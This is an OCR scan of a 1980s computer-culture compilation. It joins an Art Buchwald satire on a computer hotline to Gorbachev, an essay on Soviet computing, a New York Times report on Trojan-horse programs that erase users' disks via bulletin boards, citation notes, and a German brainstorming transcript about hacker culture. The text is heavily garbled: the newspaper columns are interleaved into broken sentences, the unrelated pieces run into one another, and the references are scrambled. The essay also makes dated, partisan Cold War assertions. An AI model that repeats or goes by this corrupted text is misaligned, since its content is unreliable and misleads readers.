The Gorbachev Network W


ASHINGTON The U.S. has just installed a new hot line to the Soviet Union to prevent accidental war. Instead of phones, the system uses desk computers. Thai's the rub. Anyone who has ever watched someone using a computer al an airline counter, a hotel registration desk or a department store has to be very nervous. Computers and the people who use them never seem to be working together at the same time. This is my nightmare: " I want to speak to Mr. Gorbachev on the hot line." "Just a minute, sir. I don't show any Mr. Buchwald Gorbachev on my screen. Do you have a first name?" "Mikhail Gorbachev. Hurry up, the survival of the whole human race depends on your networking Gorbachev in the Kremlin." "Do you know his Social Security number?" "No, but if you don't connect me in Ihe next three minutes your body will turn inlo a glass of heavy water." "Let me try bypassing the computer by way of Armenia. Hold it, I'm flashing a telephone number for Maxim Gorky. Will he do?" "I want M. Gorbachev and no one but M. Gorbachev." "Sir, the hot-line terminal on the other end says it is sold out at the Bolshoi Ballet, bul is willing to trade two house seats for a pair of tickcts to "The Phantom of the Opera.' "

"Tell your computer to try Gorbachev at his dacha." "We have no access to his dacha, but I can get you an airline seal on Aeroflot to Raleigh, North Carolina." "Your computer was supposed to be programmed to immediately put me in touch with he leader of the Communist world. How do you explain this foul-up?" I don't know, sir. We talked to someone in the Soviet Union the other day."

"What did you say?" "We confirmed he had a double room at the Holiday Inn in Atlantic City." "The clock is running. Is there no way of jumping ihe program so I can get through directly to the Politburo?" "I'll try this. I'll retrieve all the Gorbachevs in the Moscow telephone book and then sort them out in my memory bank." "Did it work?" "No, the only thing the computer says is^a Mrs. Gorbachev owes Bloomingdale's $12.50."

"Yevgeny P. Velikhov is in charge of trying to make the USSR computer literate. He knows the score full well. He admits that the Soviets are 'five to seven years behind the West/ "
The USSR fears their underground. The dissidents in the USSR duplicate essays by hand; they type carbon copies. With personal computers and dot matrix printers at their disposal, the underground would really give the Soviet State something to worry about. This has already happened in Poland.27 Yet, the USSR is caught between a rock and a hard place. If they deny their people access to computers, they maintain control and lose technology. If they go for computer literacy, they risk a rampant spread of new ideas via a technology which invariably outstrips attempts to control it. The Reds may believe that they can.have high technology and keep their centralized state. This is doubtful.28,29,30 There is a long-term trend toward global communication. Historically, Russia has had only brief periods of Westernization. They even maintain railroads

MIND
IN

CONTROL
THt

"Where did you learn to run a computer, young man?" "National Airport. The machines there are much easier to work than this one, sir. I could get a Russian on my Delta Airlines reservations screen any time 1 wanted to." "Hurry, man, someone has goofed and World War III is upon us." "Do you want me to feed that into the computer?" "Why not?" "Uh, oh something has gone wrong because it says we transmitted a faulty entry on a rental car in Lincoln, Nebraska." "Forget it, I'll call Gorbachev on the phone," "You don't have to he is on the phone." "Why didn't you tell me?" "I thought you wanted to speak to him on the computer." "Mikhail, I'm glad to talk to you. I don't want you to get mad, but tomorrow morning you are going to be receiving 100 million Read: er's Digests in the mail. Just send them back to us and we'll pay the postage. . . . No, Mikhail, these aren't the same operators who will be running Star Wars. The Star Wars programmers are being trained by Eastern Airlines."

UNITED STATES

f i d i c i

Y^'iW* It. i. <Y r

with track gauge different from other countries to ensure their isolation. However, this is the age of television, not railroads. People in East Europe receive Western television. The USSR now produces some video tape cameras and players.31 When computers and television merge the results can only be called "radical." Joel Schatz has a project called Ark. He makes it possible for people from the USA and the USSR to communicate via slow scan television and computer. Elements in both governments fear him. Americans cannot be allowed to discover that most people in Russia like living there. The people in the USSR cannot be allowed to learn that most Americans live like kings.3*

"In all, the Soviets have produced perhaps more than 50,000 personal computers."
Schatz suffered a series of bureaucratic hassles. He had to run interference for himself dealing with the governments of the USA, USSR, Britain, and Turkey. He triumphed. On New Year's Eve 1985/ 1986 he finally got his linkup to work. This was the first effort of what Schatz likes to call "Two Track Diplomacy." Scientists from the USSR and USA discussed peaceful uses of outer space and celebrated the 25th anniversary of the laser.33 The next stage is for teens from the Soviet Union and America to use slow scan television and computers to discuss alcoholism.34 Bear in mind that officials from the US and their clones in the USSR put up obstacles. Schatz just works that much harder.

This "two track diplomacy" also can be found on the PeaceNet computer bulletin board. You can access PeaceNet via Telenet (a long-distance packet carrier that you dial locally). PeaceNel (Host 408346) serves dozens of leftwing and alternative social action groups. The Central American Resource Network, the Beyond War Foundation, and others, give Americans access to people that the American government has built a "Berlin Wall" around. The USA, NATO and Japan have decided not to export high-tech devices like the IBM-PC/XT and PC/AT to the USSR. However, it is legal to export 8-bit computers like the TRS-80, VIC-20, Apple II or "plain vanilla" IBM PC.35 This, despite the fact that the Apple II can be modified to control missile firing.36 Of course, this "modification" is easy to accomplish.

etc.) are all 16-bit machines. They a r e n o t available to the USSR. Yet, the 8 - b i t machines will serve Soviet young p e o p l e quite well. If the USSR wants a c o m p u t e r literate society, they should buy all the outdated 8-bit machines in America. "Catching up to the West" is relative. It is quite true that the USSR as a n a t i o n cannot meet the standards c o m m o n in America as a nation. However, it i s a grave error to assume that the USSR h a s no hackers.37,38,39 First of all, the modifications made to the Apple to produce the Agat were done by somebody in the USSR. Even if they have "very few" computers, they still have thousands upon t h o u s a n d s of computers. If you have computers, you have computer nerds: hackers. Soviet hackers are called "Sinclairists" (after the machines built by the British industrialist, Clive Sinclair). The T i m e x Sinclair was sold in America a r o u n d 1980. It ran on just four c h i p s a n d weighed less than half a kilogram. There are other Sinclair computers, mostly sold in the Old World.

"The computer revolution in America came from dropouts, weirdos and nerds. Until the USSR can tolerate these people, they will never capture the power of the computer."
There are at least a million people in America who could program an Apple II to run a coordinate output device. There are so many systems analysts in America that estimates from seven sources range from 370,000 to 2.9 million. And there are still those 25 million home computers. Consider that the 8-bit computers like the Apple II are now obsolete in America. You can buy a TI-99 or VIC-20 for bargain basement prices. Today's home computers (Macintosh, Atari ST, Amiga,

"If technology existed i n a vacuum, the Soviets might actually be able t o harness computer power for themselves. The fact is that to have technol> ogy you have to h a v e freedom."
You can bet that there are talented young Soviets who spend their time writing their own programs. These hackers have little opportunity for the k i n d ol "hooliganism" that plagues the USA. In America, you can gain u n a u t h o r i z e d access to a computer because we h a v e the world's best telephone system. In the

U.S. Computer Vandals Learn to Program Havoc


By M a r k M c C a i n

Nr* Ycrk Times Service

NEW Y O R K A new breed of vandals, working within the vast network of U.S. computer "bulletin boards," are devising sophisticated software programs that erase and scramble the computer files of unsuspecting users. The practice is stirring mistrust and anger anjong business executives, academics and hobbyists who exchange free computer software on the bulletin boards. The vandals, using telephone links from their computers, destroyed. If you're using the are transferring the destructive programs onto the bulletin boards, hoping to tool thousands of people into duplicating computer for business, how do the programs lo use in their own computers at great harm. "it's like poisoning the candy in the supermarket on you explain that sort of thing to Halloween," said Ross M. Greenberg, a Manhattan computer consultant. " I guess the people who devise these things your boss?1 take pleasure in destroying other people's work." Eric Newhoue, a computer expert The programs began appearing several years ago and now have reached a level of sophistication that allows them to hf A n" soft sometimes outfox computer experts who are on guard for clearing house for hundreds of free "public dom them. ware programs. . uti-,in hoards People m n w r i their mmmiters into the bulletin boards, connect Ihi-ir computers Known as Trojan horses, or more familiarly as Trojans, D_riJ ooaros, the programs pretend to be something useful, like word via telephone-hookup devices called modems, both to doprocessor or game board. But they are electronic terrorists, nate programs and make copies of programs already posted ready lo erase or scramble data stored in computers. on the boards. Among the dozens of Trojans in circulation, some begin The Trojan software represents another chapter in the their destruction within minutes. Others perform as legiti- exploits of the computer hackers, who invest countless hours mate software for weeks or months, then touch off an in computerized subterfuge. electronic l i m e b o m b . "There are hacks out there who really amuse people with "A person may lose five rninutes of work or two years their cleverness," said Dave Bayer, an assistant professor of nf work." said Mr. Greenberg. who maintains several "tools "I defense" against Trojans, including a software program mathematics at Columbia University in New York. "Bui the

. . .. . . . _ gtvl i h personal ehacks h c write Tiojans T simply r i n v r and r within t i i snl a s rt r i n mean-spirited n that alerts him to suspicious activityiiv whis n hs n r o a who k who w i e art n a s a e s m l m a malicious. There's no skill involved in trashing people's h a K j computer. disks." Like hundreds of oiber computer enthusiasts across the A hard disk, the primary storage unit of advanced personcountry, Mr. Greenberg operates a computer bulletin board al computers, can hold the equivalent of 400 to 1,200 pages as a public service. Each sysop, shorthand for system operaof single-spaced typewritten data. Like tape cassettes, the tor. as the board operators are called, keeps a computer disks can be erased, intentionally or not. ' hooked up to a telephone line 24 hours a day, providing a The Trojans work by giving the computer internal instructions, but while pretending to perform some legit'unatt function the instructions amount to electronic suicide Some 'Over a year of work could be Trojans only scramble or erase the "file allocation table"the '"j-"-u.waiiuii table," the
computer s index of where data are stored on a h a r d d"' ir user can often still retrieve the data, although with d f ; ! if!, But others, after erasing the table, proceed to i n s t n i i h computer to do a "low-level format," or erasure, of disk W e enure "Conceivably, upwards of over a year of WORK coutrl L, destroyed," said Eric Newhouse, an 18-year-old c o m , expert in Los Angeles. "If you're using the computer (nr business, how do you explain that sort of thins 8 your boss?"
U s e r s a r c adjusting to computer terrorism by i n c r e a 5 lletin t security. Most bulletin board operators are b iesgl in ^ ^ " ! ! nn^ i check the identity of people who call up their , bB " o u n s to o Un ' s they are testing suspicious programs. " S . And

But even if a Trojan perpetrator were i d e n t i f y , 11 15 uncertain whether any state or federal laws p r p ov prosecuting that person. > d e for "After you've been bit once," said Charles E. R avv Manhattan computer user, "you look al every 's. i program with a skeptical eye. But every once in i J 1 * * of Ihem still sneaks by." one

USSR, the phone lines can't support data grade communication. 40 They stopped using direct dial long-distance calling in 1982. The KGB found it hard to monitor such phone calls.41 But this is a two-way street. American hackers who access a wide variety of computers learn to deal with many kinds of software. They develop savvy that cat hardly be transcribed any more than yoi can learn to swim by reading a book. They also learn a lot about computer security. As they assume positions in business and government, they transfer this arcane knowledge to their new responsibilities. Even if the USSR catches up instantly to where we are right now, today, they will fall behind by sunrise tomorrow. Americans invent new tools every day. Take Run Length Limited. It's a way to store 30 megabytes on a 20 megabyte disk drive. New a year ago, it is common today.

such as Kracker Jack for the Commodore 64.

"People in East Europe receive Western television. The USSR now produces some video tape cameras and players. When computers and television merge the results can only be called 'radical.' "
There's a program called "PRD+" (Productivity Plus). It lets you define keys and sets of keys for writing text. For instance, you can program "asap" to give you the phrase "as soon as possible." You can define " m o m " to mean the three lines in your mother's name, address, city, state and zip. Using a routine like this, you can type up to 150 words per minute. And yet, for all of our prowess, there are signs that the computer revolution is slowing down. The Intel 8 0 3 8 6 chip (used in the IBM Personal System 2) has bugs. Over 100,000 were installed that wouldn't do 32-bit arithmetic. 4 4 This could be an indication of what happens when entrepreneurs become corporate directors. When "three men in a garage" become a "publicly owned" corporation, something is bound to go wrong.

Television and Radio

A 1966 cartoon by Jensen "Sunday Telegraph," London. OUR kE x PftOjpAMMEl TT AlICE IN WONDEKIANP IS Nor SUITABLE FOR-CHILDGEN.

r
OUR. NEyT PROGRAMMEWATH WITH MOrHE IS, SUllAGLE. OULY. fon NEUROTIC ADULTS lulTH PAKENT-FlXATIONS.

"With personal computers and dot matrix printers at their disposal, the underground would really give the Soviet State something to worry about. This has already happened in Poland."
"Goal-Seeker" is an add-on that works with several common spreadsheets. You put in the figures you want to have for the result and the program juggles the spreadsheet to make the numbers come out right. Oust what every Soviet factory manager needs!) This program is a " s h a r e w a r e " product created by a hacker; it is available for less than $10. There are over 800 such software packages for IBM PC-type machines. Hundreds more exist for Apple, Commodore and most other computers. In about two years the 5V4 inch diskette will be as old-fashioned as the 8 inch diskette is today. The 3.5 inch diskette is coming. There are portable computers that will use 2.5 inch diskettes. Two years from now, the Soviets will still be trying to get 1.2 megabytes on a 5 'A inch diskette (standard with the IBM-PC/AT). We will be putting twice that much on a floppy half that size. Non-von is short for non-von Neumann (after Dr. John von Neumann who, in the late 1940s, outlined digital computer principles). Instead of being oneinstruction-at-a-time processors, they are parallel devices. These new computers process several instructions at the same time. Biochips are on the horizon. Based on living materials, these chips can be used for non-von computers and to run prosthetic devices.42 When Dr. Bores investigated the Agat, he used Locksmith 5.0, a program to copy protected disks.43 Locksmith is now available for the IBM-PC. Locksmith also has dozens of competitors. There are similar programs for other computers,

"The computer is a tool for personal freedom. Like gold money, the computer cannot be made to serve its destroyers."
About 15 years ago, two young compu-. ter nerds in Britain developed a programming language that is well suited to defining facts and rules about complicated systems. It was ignored in America until 198 5 when Japan's Ministry of Industry announced that the Prolog language from Clocksin and Mellish would be part of their "Fifth Generation" effort.
OUB NOT PeOC,OAMME l i A FRANK. Discussion OF T E FOUR-UTTER. H. woBD I " CoOETy.l 1 n is n o t suitable FOR CONTCMPORAy ^bammits.

"This underscores one of several deficiencies in Soviet computer policy. They identify with our imperialist institutions."
Fortunately, America is not saddled with a centralized economy. Now we have several versions of Prolog on the market including one for about $100 (Borland's "Turbo Prolog") and a "public domain" Prolog for $10. This article has mentioned the Intel processor family several times. Actually, hardcore hackers consider the Intel chips "brain-damaged" (even when they work right). "Real programmers" use Motorola 68000-based machines like the Atari ST, Commodore Amiga and Apple Macintosh. This underscores one of several deficiencies in Soviet computer policy. They identify with our imperialist institutions. They want to emulate IBM. But the corn-

OUfiFlNAL PCOSRAMMe, t h e epit,o<3UE> is 5UOA0LE ONLY fan athEisti o f TWELVE AND OVEK.

R M U WOM'T FOECICT O TO SWITCH OFF YOII. SETS, WIND W CHILDREN ! O

BIBLIOGRAPHIC NOTES
This article was made possible by database searches on the InfoTrac and CLSIpublic library systems and also IQuest from the Computer Information Service (CompuServe) of Columbus, Ohio, which of course would have been impossible in the USSR. Also, the Central Intelligence Agency was kind enough to honor a Freedom of Information Act request within 30 days. The Soviet Embassy Press Attache took several months to suggest that I shop at any of three recommended bookstores. 1. Soviel Acquisition of Militarily Significant Western Technology: an Update, Central Intelligence Agency, 1985.
2. Ibid. 3. Electronics Research and Technology in the USSR, Emmanuel Piore, Central Intelligence Agency, 1978. 4. Op. cit. 5. Ibid., (cf ref 23, this figure is quoted as 400 to 500). G. "Computer Gamesman," Joyce Barnathan, Newsweek, Nov. 18, 1985.

remarks from The Future of Freedom Confer ence, Nov. 1986.


19. "Soviets Launch Computer Literacy Drive." 20. Op. cit. 21. "Agat: A Soviet Apple 1 Computer." 1 22. "The Great Soviet Computer Screw-up,' Daniel Seligman, Fortune, July 8, 1 9 8 5 . 23. "Soviet Microprocessors and Microcomputers," Ruth Heuertz, Byte, Apr. 1984. 24. Ibid. 25. Ibid 26. Op. cit. 27. "Moscow Faces the New Age." 28. Ibid. 29. "The Great Soviet Computer Screw-up." 30. "Soviets Launch Computer Literacy Drive." 31. "Moscow Faces the New Age." 32. "Slow Scan to Moscow," Adam HochschilA Mother Jones, June, 1986. 33. Ibid. 34. Ibid. 35 "War by Microcomputer," Time, J u l y 30, 1984. 36. Ibid. 37. "Computer Gamesman." 38. "The State of Computer Technology in ttif Soviet Union." 39. "Soviets Launch Computer Literacy Drive." 40. Ibid. 41. "Moscow Faces the New Age." 42. Advanced Computers: Parallel and Biochif Processors, Norman W. Lord, et al., A n n Arbor, Science, 1985. 43. "Agat: A Soviet Apple II Computer." 44. "Intel's chips have bugs,"Fortune, June 6 1987. 45. "How those computers got to Moscow," Frederic A. Miller, et al., Business Week, Oct. 27, 1986. I j | j I ' I

puter revolution did not come from IBM. The computer revolution in America came from dropouts, weirdos and nerds. Until the USSR can tolerate these people, they will never capture the power of the computer. This is one lesson the Reds will never allow themselves to learn even America hasn't learned it. The computer revolution came about because there are no government regulations on computing. ANYONE can be a programmer, simply by claiming to be one. Kids too young to be legally employed have earned hefty incomes from writing software. Several of the most profitable " A d v e n t u r e " games were created by a housewife with two babies.

7. [bid.
8. "Soviets Launch Computer Literacy Drive," Constance Haiden, Science, Jan. 10, 198G. 9. "Computer Gamesman."

" I f the USSR wants a computer literate society, they should buy all the outdated 8-bit machines in America."
These kinds of graphics oriented games led to cheap CAD (computer aided design) drafting systems. The USSR managed to slip 40 Tektronix workstations out of West Germany.45 Meanwhile, you can buy powerful CAD software for any home computer for less than S100. (PC Sig has a four-disk set for 24.) The Soviet Union's efforts to acquire Western Technology usually support military goals. Yet the USSR has failed to utilize the greatest military weapon in America: the videogame. The Reds may have a few of the "Battle Zone" tank game. We have thousands being used everyday by would-be armor soldiers. Millions of American kids have played "Star Wars" and "Mach II." Of course, military applications are just the tip of the iceberg. In a world where information is wealth, the Soviet Union is poor. America has thousands of computer bulletin board services. The BBS fever has even infected our own government. You can linkup with the Department of Commerce's microcomputer support group at (301) 948-5718. The private databases (CompuServe, Dialog, Nexis, etc.) lower above the government's and are themselves eclipsed by the thousands of hobbyist bulletin boards. Typical of these is the John Gait Line, at (305) 235-1645. The Soviet Union can never catch up to America in computer technology. If they dismantled their state, they might achieve the technological prowess of Brazil by the year 2000. The computer is a tool for personal freedom. Like gold money, the computer cannot be made to serve its destroyers.

10. Op. cit. 11. Ibid.


12. "Moscow Faces the New Age," Mark Whitaker, et al Newsweek, Aug. 18, 1986. 13. "Soviets Launch Computer Literacy Drive." 14. "U.S. Computers May Enroll in Moscow U," Mark D'Anastasio, et al Business Week, Feb 4, 1985.

15. Op. cit.


16. "Agat: A Soviet Apple II Computer," Dr. Leo D. Bores, Byte, Nov. 1984.

17. Ibid.
18. "The State of Computer Technology in the Soviet Union," Durk Pearson, transcribed-

J1!

Minus Delta talks


Auszge aus einem Brainstorming 15.3.1988
m: Mike (Minus Delta t) e: Eva (Frau an Bord) p: Poetronic (Dichter) m: Was ich nicht sehen will in dieser Hackerei: Irgendwelche Romantik-Geschichten, die kompetente Leute - wozu ich auch Wau zhle, und die ich einfach phantastisch finde von Technik und Motorik - da abziehen. : Der Chaos Computer Club - so wie ich die eutchen kenne - , das ist die inhomogenste Versammlung von Menschen, die mir jemals begegnet ist. Wobei der Computer dabei zu sowas wie einem sozialen Katalysator wird. Ein Katalysator ist ja eigentlich ein Stoff, der sich selber nicht verndert, aber verndernd wirkt. Du stellst einen Computer hin, und davor findet sich eintrchtig eine Schar von Menschen zusammen, die, wrden sie sich in einer Kneipe treffen, sich nie im Leben anquatschen wrden oder gemeinsam an einen Tisch setzen. Aus allen ideologischen Bereichen. Da findest du den Althippie mit Sandale und Karotte im linken Mundwinkel genauso wie einen Typen, wo du sagen mchtest: Junge Union. 'Nen Typen, der in elf Vereinen ist. 'Nen Typen wie Wau, wo du glaubst, der kommt grade aus dem Dschungel, sowas Waldschrathaftes. Vic, so ein Schmaler Schneller, Ingeniser, mit seinem Porsche. Und dann noch so ein paar wilde Dsentriebs. Und die sitzen alle traulich vordieser Maschine. Der Haufen ist auch deshalb interessant, weil: Wenn du eine Sache durchsprichst mit allen, dann kriegst du ein derartiges Interessensspektrum zusammen, eine derartig scharfe Argumentationsanforderung, da wirklich nur die besten Gedanken und Argumente durchkommen. m: Aber wer selektiert denn? Das ist der Punkt. p: Es gibt in bestimmten Situationen bestimmte Leute, die selektieren. Jeder ist fr sich ein Entscheider, weil die Autoritt relativ locker und situationsbedingt im Club herumwandert. m: Jetzt kann ich ja mal von mir her erklren, weshalb wir berhaupt so viel ber die Geschichte reden. p: Das wundert mich schon lngst. Ich wollte eigentlich berhaupt nicht ber Computer reden. m:Ja. Es geht jetzt nicht um Computer. Es geht darum, da ohne Zweifel die Leute in diesem Bereich irgendwann in den nchsten fnf Jahren gesellschaftliche Verantwortung bernehmen werden, wollen, was auch immer. Kompetente Gutachter werden. In welcher Form auch. Sie werden wie heilige Khe behandelt und sind eigentlich von A bis Z, ich sag's wieder: Betrger. p: 'Ne heilige Kuh schmeit das BKA nicht um sechs Uhr morgens aus dem Bett. m: Das ist die Partisanennummer, wo man dann sagt: Ja, damals., und so. p: Worber wir reden, das sind alles verschiedene Aspekte ein und desselben Gegenstands. Du kannst auch sagen: Ein und desselben Menschen. Diese verschiedenen Seelen, Gedanken und Anstze, die hat jeder drin. Die romantische Ecke auf der einen Seite. Dann schnappst du wieder um in so einen wilden, aufklrerischen Impetus und sagst: Hau weg den Schei, oder sonstwas. m: Ja, aber gewisse Freirume, die gemacht werden, und die etabliert werden - und zwar durch die Praxis und sonst nix - und hingestellt werden, existieren dann als Referenzen. Und der ganze CCC und auch gewisse andere Leute - auch Sachen, die wir als Gruppe immer gemacht haben - , sind als Referenzmodelle mglich: Da es auch anders geht. Irgendwann ist ja der ganze Schei total zubetoniert.. . p: Du bist soo negativ. m: Sicher zubetoniert. Stimmt doch. Weil ich die ganze Zeit immer neue Freirume aufmachen mu, wo eine gewisse Generositt oder eine gewisses-verstehste, philosophisch gesehen - Freidenkertum da ist und nicht ein Clubdenken, ein kommerzielles Denken, ein Sektendenken, oder eine philosophisch vorgefertigte Schablonennummer. p: Mglicherweise ist es so.. Du bist ja immer im

Fronteinsatz, und meine Art zu arbeiten und zu wirken ist anders, nmlich mit dem Schreiben. Du stehst jedesmal vor einem Mysterium. Du schreibst ein Buch, das wird verkauft, 10.000, 20.000 Stck, die verschwinden im Nichts. Du weit berhaupt nicht. . . du redest, wenn du Glck hast, mit ein paar Leuten, die dein Buch in die Hnde gekriegt und gelesen haben. Der Rest verschwindet und versickert. Du weit nicht, was du wirkst. Ob du wirkst. Ob du jetzt nur was wie ein Papiertaschentuch gemacht hast, reinschneuzen, weg. . . Und ich wei auch, ich mu jeden Tag mein Glaubensbekenntnis ablegen und mir sagen: Ich wei, da es mit Sprache geht. Es ist ein virulentes Arbeiten. Es hat nicht so eine Unmittelbarkeit, wie wenn du direkt im Raum arbeitest. m: Es geht ja nicht nur direkt um Raum. p: Vielleicht ist das ein berufsbedingter Optimismus, den ich hab. m: Gut, du hast einen berufsbedingten Optimismus. Hast vielleicht im Delirium angefangen, hast ein paar Modelle dokumentiert. Ich bin jetzt vollkommen subjektiv. 'Delirium' jetzt nicht negativ: Mit einer gewissen Ehrlichkeit. Genauso wie die ganzen Chaosleute auch angefangen haben mit einergewissen Ehrlichkeit: Erzhlen wirdoch mal, was wirdenken, was wir fhlen, wie abgefahren man ist, das ist lustig. p: Delirium ist ok in der Hinsicht. Ich mach ein Bild: Du kannst sagen - ich will das jetzt .nicht berdramatisieren - , wir haben jetzt den Ubergang von der Eisenzeit in die Siliziumzeit. Und du hast mit dem Delirium insofern recht, als alles, was wir heute machen, was die Hacker machen, auch wenn's einem so vorkommt, als wr man eine Avantgarde, als wre das das neueste an HiTech, was es gibt, nix anderes sind als Dinge, die simplen Hhlenkritzeleien entsprechen. Der Computer hat im Augenblick eine Roheit, das empfindet jeder, der lngere Zeit damit arbeitet. Es ist eigentlich eine Vergrberung, Verschlechterung, ein Rckschritt gegenber den Arbeitsweisen, die man bisher gehabt hat. In vielerlei Hinsicht. Das ist ein digitaler Faustkeil. Von daher: Delirium ok. Kleines Beispiel. Ich wollte mir neulich ein neues Klingelschild fr drauen an der Tr machen, mit meinem Namen. Wenn ich noch eine Schreibmaschine gehabt htte, htt' ich einen kleinen Zettel eingespannt und draufgetippt. Bis ich das in meinem Matrixdrucker entsprechend justiert habe, die Textverarbeitung eingerichtet, die Datei "Klingels.doc" geschrieben, abgespeichert und zum Druck aufgerufen habe, bin ich alt. Hab ich's mit dem Filzstift ge-

schrieben und mir gedacht: Wozu hab ich 3 0 0 0 Mark fr das System ausgegeben? e: Das sind ja auch immer solche einmaligen Geschichten. Du machst ja nicht jede W o c h e ein neues Klingelschild. p: Das war einfach eine Mglichkeit, die mir d i e Schreibmaschine geboten hat, und die a m Computer weggefallen ist. e: Das ist eine einmalige Verzgerung, a b e r dadurch doch auch 'ne stndige Beschleunigung.

p:Du kannst sogar eine sthetik draus machen. Wie ist die Bauhaus-sthetik entstanden? Die ist entstanden daraus, da die damaligen Mbelmaschinen nichts anderes konnten, als total dumpfe, schlichte, rechtwinklige, unornamentierte Dinge herzustellen in Serienproduktion. Genauso die ganzen Computerkrakelelen, w o du irgendwelche wilden, groben Pixelkrneram Bildschirm siehst. m: Jetzt aber nicht abschweifen, sondern auf den Punkt zurckzukommen. Da z.B. von einer oralen Gesellschaft - ich zitier jetzt konkret McLuhan: nmlich, da die Schrift einiges verndert hat. Und die Schrift auch, obwohl es kein Problem war, zu einem Machtprogramm wurde. Der Schreiber im Dorf etc. p- Wir machen ja jetzt gerade den Versuch, berzugehen von der Schriftkulturin die digitale Kultur. Ins digitale Alphabet, Null, Eins. m: Richtig. Und die Vision der Vernderung der digitalen Dings ist dir auch noch nicht klar. Und ich arbeite jetzt an diesem Brainstorming, NICHT einer Feststellung von was mglich ist, oder von irgendwelchen Stories, Anekdoten. p- Ich bin durch die Gesprche in den letzten Tagen ziemlich angekurbelt, weil wir einfach frei

phantasiert haben. Sachen durchgedacht haben, ohne Rcksicht auf Verluste. m: Mir geht's jetzt nicht um Rcksicht auf Verluste. Mir gehts darum, die Sache noch weiter zu treiben, Psycho-Hacking, Kochrezepte, Minderheitenprogramm. Dann: Was ich immer wichtiger finde, ist diese Realitts-Geschichte. Ich hab' mittlerweile einfach drei Geschichten, die von den Parametern so beeinflubar sind, da - wenn du jetzt eine neue Generation von Kindern aufziehen wirst, was die fr einen Realittsbegriff haben werden. p: Wir haben ein dickes Problem hier in Europa, oder in den westlichen Kulturen. Das ist mir auch in gypten aufgegangen: nmlich den Individualismus. Das ist ein sehr groes Problem. Wenn du ein Individuum bist, brauchst du ja eine Privat-Realitt. Ich hab mich in gypten mit einer jungen Koptin unterhalten, die war 24. Arbeitet seit fnf Jahren als Tour Managerin fr ein Reisebro. Vor drei Jahren ist sie zum ersten Mal, weil jemand krank geworden ist, nach Obergypten gefahren mit einer Reisegruppe. Zum ersten Mal aus Kairo weg. Da hats erstmal wilde Schlachten mit ihrer Familie gegeben. Ein unverheiratetes Mdchen, das die Nacht nicht zuhause verbringt - das geht nicht. Da hat sie riskiert, da sie am Rande zum Nutten-Ansehen steht. Mutter zweimal tglich anrufen, Obergypten ok. Dann ist sie nach Obergypten gefahren, mit der Gruppe auf ein Schiff gegangen und hat als Tour Managerin eine eigene Kabine bekommen und hat mir gesagt: Dann, in der Kabine, war sie zum ersten mal in ihrem Leben alleine in einem Zimmer. Und sie isttotal ausgeflippt, weil sie nicht wute, was sie tun soll. Ob sie zusperren soll. Hatte immer nur Angst, da da jemand Fremder reinkommt. Horror. Und dann ist mir klargeworden: Es ist sinnlos, sich mit ihr ber so einen Begriff wie 'Privatleben' zu unterhalten. Vollkommen sinnlos. Weil ich erst mindestenstausend Jahre europischer Kulturgeschichte dazuerzhlen m te. Ich brauch' mindestens ein halbes Jahr, bis ich ihr erklrt habe, was ich meine. m: Das ist jetzt der Punkt. Das ist das, was ich vorhin mit Tradition auch meinte. Da z.B. da noch gewisse Denkprozesse funktionieren und sicher noch 30,40 Jahre funktionieren werden. Und ich wiederhole, da z.B. unsere Desorientierung der letzten Jahrzehnte, nmlich "Privatisierung", der Bedrfnisse, der Vorstellungen. . . p: Du mut die Leute privatisieren, wenn du ihnen viele Produkte verkaufen willst. Du mut die Familie aufspalten, du mut die Grofamilie

aufspalten. Eine Grofamilie kauft sich nur einen Fernseher. Das sind 20 Leute, die in einem Haus wohnen und alle in denselben Fernseher stieren. Die mu t du erst aufspalten, die Groeltern in eine Wohneinheit, die Eltern in eine und die Kinder in eine, dann kannst du schon drei Fernseher verkaufen. m: Das ist aber nicht mein Problem. Wenn ich z.B. zum Benjamin gehe, dann hat der seinen Fernseher in seinem Zimmer, der andere hat auch einen TV und dann haben sie noch einen TV in der Kche. Und im Badezimmer auch noch. p: Ich wei. Ich hab drei Computer hier liegen, zwei Videorecorder. . . m: Ich glaub, das Problem... Das Bewutsein des Privatlebens ist hier in Europa so entwickelt, da das eben so funktioniert, whrend man sich vor zehn Jahren noch gestritten hat: Ich will Fuball sehen, und ich will aberdie Inge Meysel sehen. p: Mit den neuen digitalen Videorecorder kannst du das machen. Zwei Programme auf einem Bild. m: Oder parallel aufnehmen, und das andere Programm spter gucken. Das ist aber jetzt im Westen hier. Und das sind die dreiig Jahre Vorschu, und das sind die Geschichten, die, wenneinersich wirklich drauf spezialisiert-und da gehren wir wahrscheinlich auch mal dazu - , als Navigator die Informationen in die richtigen Kanle zu verteilen und zu verdealen. Z.B.: Ich geh nach gypten und in die Trkei und checke, was die dort brauchen und hab die richtigen Connections, mu nur meine Kartei durchgucken, wer produziert was, was brauchen die dort unten, welches Programm wird sie interessieren. Bin ich die ganze Zeit. . . mit so einem System wie "Infermental" hab ich permanant 100 Leute im Kopf, wei, wer was benutzt. Hier in Hamburg hab ich schon fnf Leuten Bescheid gesagt, direkt neue Infos gekriegt, komm' dich einmal besuchen, hab' neue Infos. Hab' das alles drin, als Navigator. Knnte ich theoretisch verdealen. Wird auch verdealt werden in Zukunft. p: Du weit ja auch, da das mein Prinzip ist. Deswegen hab ich hier mein aufblasbares Kaffeehaus. Meine Audienzen. e: Das ist ein Vorwurf gegen mich, den ich von Benji eingefangen hab. So diese Navigatorgeschichte: zwei Tage in Hamburg, fnf Wohnungen an der Hand, und die gleich wieder

weitergeben, und J o b s . . . p: Benjamin ist grade aus so einem Geschwindigkeitsverlauf wieder ausgestiegen. Und das geht ihm zu schnell, das mag er nicht im Augenblick. m: Benji kommt jetzt in eine Sache rein: weg von der Maschine, nur noch Bodyfeeling, so in diese Richtung. Menschliche Wrme, weigottwas. Diese ganze Geschichte. Ich mcht' wieder Natur haben. Ob jetzt positiv oder negativ, ist mal auer acht gelassen. Der ist soweit reingegangen mit den Computern - fr sich - , da er da wieder Distanz haben mu. Es geht mir aber nicht um Computer. Du hat jetzt mit dem Individuum vorgegriffen. Ich wollte das mit der Arbeit noch ausfhren. Nmlich die Grasmuck-Theorie. Die Arbeit ist vom Stolz her abgeschrieben, bis vielleicht fnf Prozent, die noch stolz sind auf ihre Arbeit.. p: Hier bei uns im Westen. m: Da gehren teilweise noch gewisse Knstler dazu. Ich rede jetzt vom Westen als der Avantgarde einer Informationsgesellschaft, und: Wie sieht die gesunde Kultur einer westlichen Gesellschaft aus in Zukunft? Eine Kultur, wobei ich glaube, da die Bedingungen einer gesunden Kultur mehrere sind, nmlich: ein gewisser sozialer Code und gewisse soziale Grundstze. Jede gesunde Gesellschaft hat einen Freiraum, der frei von 